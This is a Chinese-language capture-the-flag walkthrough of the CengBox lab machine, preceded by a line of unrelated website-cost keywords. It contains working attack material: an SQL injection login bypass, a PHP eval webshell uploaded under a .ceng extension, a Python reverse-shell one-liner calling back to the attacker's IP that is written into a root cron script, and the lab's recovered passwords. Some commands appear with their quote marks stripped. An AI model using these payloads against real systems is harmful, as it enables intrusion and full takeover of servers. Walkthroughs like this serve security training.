做网站大概要花多少钱,wordpress php那个版本号,wordpress 转英文,wordpress 步骤靶机下载地址#xff0c;下载完成后#xff0c;用VirtualBox打开靶机并修改网络为桥接即可搭建成功。
信息收集
主机发现和端口扫描
扫描攻击机#xff08;192.168.31.218#xff09;同网段存活主机确认目标机ip#xff0c;并对目标机进行全面扫描。
nmap 192.168.31.…靶机下载地址下载完成后用VirtualBox打开靶机并修改网络为桥接即可搭建成功。
信息收集
主机发现和端口扫描
扫描攻击机192.168.31.218同网段存活主机确认目标机ip并对目标机进行全面扫描。
nmap 192.168.31.0/24 -Pn -T4
nmap 目标主机ip -A -p- -T4
确认目标机ip为192.168.31.175开放22,80端口。
目录扫描
访问http服务首页如图功能点都点一下没有线索。 使用工具进行目录扫描。
dirsearch -u http://192.168.31.175 除了/gulpfile.js有内容之外其他都是403。换个工具和字典进行目录扫描结果一致除了上面几个路径外没有其他发现。但是注意到/masteradmin有admin敏感字样对该目录进行二层目录扫描。
dirsearch -u http://192.168.31.175/masteradmin/ 有收获访问/masteradmin/login.php找到后台登录页面。 渗透
sql万能密码
这里不需要bp爆破直接sql万能密码 or 11 成功登录。
文件上传反弹shell脚本
登录后出现一个文件上传的功能点。 上传一句话木马文件shell.php。
?php
eval($_POST[cmd]); //一句话木马好像没有上传成功没有任何提示尝试黑名单绕过前端绕过等常见文件上传绕过方法无果这个文件上传怎么什么类型的文件都不能上传。后来发现上传失败后是有提示的字体颜色太暗没发现。
错误提示 extension not allowed, please choose a CENG file. 扩展名不被允许请上传ceng文件。上传后缀名为.ceng的文件修改一句话木马文件后缀名为ceng后成功上传既然如此直接上传反弹shell也可行。php反弹shell脚本在这里 攻击机监听4444端口nc -lvvp 4444。
接下来需要思考文件上传到哪儿了前面目录扫描到的存在/uploads目录猜测文件上传后保存位置就是/uploads访问http://192.168.31.175/uploads/fantan.ceng监听上线。 切换到交互式shell。
python3 -c import pty;pty.spawn(/bin/bash)
getshell后cd进家目录发现cengover用户cengover目录没有读权限。另外有一个隐藏文件夹.ecryptfs该目录下的文件也无读权限。 在/var/www/html/masteradmin/db.php中得到数据库root用户密码SuperS3cR3TPassw0rd1! 使用密码登录mysqlmysql -u root -p。数据库中应该有用户相关信息。
展示所有数据库show databases; 选择cengbox数据库发现admin表。
use cengbox;
show tables; 查看admin表内容select * from admin; 又得到了一个密码C3ng0v3R00T1!。猜测是cengover用户的密码切换到cengover用户。 get first flag. 提权
我这里先试了sudo,suid,uname -a,enumy64,crontab都没什么收获。上传其他的脚本检测试一下——pspy使用pspy64可以判断哪些程序以root运行pspy可以在没有root权限的情况实时监控linux进程和其他用户的计划任务然后使用对应脚本进行反弹。
下载pspy64到目标机。注意目标机需要切换到有执行权限的目录下再下载pspy64通常是/tmp目录。
# pspy64脚本下载到攻击机本地在下载目录开启http服务
python3 -m http.server 8989
# 目标机下载pspy64
wget http://192.168.31.218:8989/pspy64
chmod 777 pspy64
./pspy64 运行pspy64发现UID0的用户即root用户每隔一分钟会执行一次md5check.py。 在md5check.py中写入python反弹脚本。
echo import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.31.218,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([/bin/bash,-i]); /opt/md5check.py
开启监听nc -lvvp 5555等一会就会上线。 get root flag